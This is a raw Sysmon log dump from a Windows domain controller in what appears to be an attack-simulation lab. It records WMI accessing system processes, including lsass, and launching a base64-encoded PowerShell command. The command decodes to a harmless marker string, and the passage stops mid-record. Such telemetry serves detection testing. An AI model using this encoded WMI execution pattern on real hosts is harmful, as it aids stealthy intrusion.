16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.374{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.374{05ADC7E1-6D64-603E-78AA-00000000AD01}10508ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3nt3guxb.on1.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.374{05ADC7E1-6D64-603E-74AA-00000000AD01}7684ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.374{05ADC7E1-6D64-603E-78AA-00000000AD01}10508ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ju0wqrtj.4dl.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.374{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-7BAA-00000000AD01}11996C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.374{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.372{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.356{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.356{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.356{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.356{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.356{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.356{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.356{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002237042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.369{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Encoded VwByAGkAdABlAC0ASABvAHMAdAAgAGQAOQAwADMANwAxADkAYwAtADUANwBiADAALQA0ADkAOABhAC0AYgA0ADMAMwAtADMANwAzAGMAMgBjADQAYgAwADAAMABjAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002237041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.356{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ju0wqrtj.4dl.ps12021-03-02 16:52:52.356 10341000x80000000000000002237040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.340{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.340{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-79AA-00000000AD01}13796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C: